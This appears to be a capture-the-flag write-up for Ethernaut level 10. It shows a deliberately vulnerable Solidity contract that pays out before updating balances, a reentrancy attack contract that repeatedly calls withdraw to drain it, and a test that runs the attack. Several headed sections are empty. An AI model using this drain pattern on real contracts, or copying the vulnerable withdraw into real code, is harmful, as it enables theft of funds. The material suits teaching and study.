Ethernaut系列-레벨 10(재진입)

레벨 10(재진입):

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

import '@openzeppelin/contracts/math/SafeMath.sol';

contract Reentrance {

  using SafeMath for uint256;
  mapping(address => uint) public balances;

  function donate(address _to) public payable {
    balances[_to] = balances[_to].add(msg.value);
  }

  function balanceOf(address _who) public view returns (uint balance) {
    return balances[_who];
  }

  function withdraw(uint _amount) public {
    if(balances[msg.sender] >= _amount) {
      //(bool result,) = msg.sender.call{value:_amount}("");
      //原文是上面这行，在0.6是无法编译的，修改为下面这行
      (bool result,) = msg.sender.call.value(_amount)("");
      if(result) {
        _amount;
      }
      balances[msg.sender] -= _amount;
    }
  }

  receive() external payable {}
}

通关要求

要点

安全建议

解题思路

    function run(address _levelAddress) external payable {
        levelAddress = _levelAddress;
        donateAmount = msg.value;
        ILevel(levelAddress).donate{value:donateAmount}(address(this));
        ILevel(levelAddress).withdraw(donateAmount);
    }
    //重入withdraw
    receive() external payable {
        uint256 levelBalance = payable(levelAddress).balance;
        if (msg.sender == levelAddress && levelBalance !=0 ) {
            ILevel(levelAddress).withdraw(donateAmount>levelBalance?levelBalance:donateAmount);
        }
    }

  it("attacks", async function () {
    await runContract.connect(player).run(levelContract.address, {
      value: ethers.utils.parseEther("0.5"),
    });
  });